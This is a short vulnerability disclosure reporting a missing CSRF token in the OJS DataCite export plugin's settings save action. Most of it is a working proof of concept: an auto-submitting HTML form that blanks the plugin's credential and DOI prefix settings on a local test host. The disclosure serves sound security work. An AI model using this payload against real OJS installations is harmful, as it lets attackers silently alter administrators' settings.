No CSRF token in DataCite save settings plugin (OJS only)
<html>
<body>
<form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST">
<input type="hidden" name="username" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="testUsername" value="" />
<input type="hidden" name="testPassword" value="" />
<input type="hidden" name="testDOIPrefix" value="" />
<input type="hidden" name="submitFormButton" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
````
# Impact
This vulnerability is capable of tricking admins to change settings for OJS DataCite plugin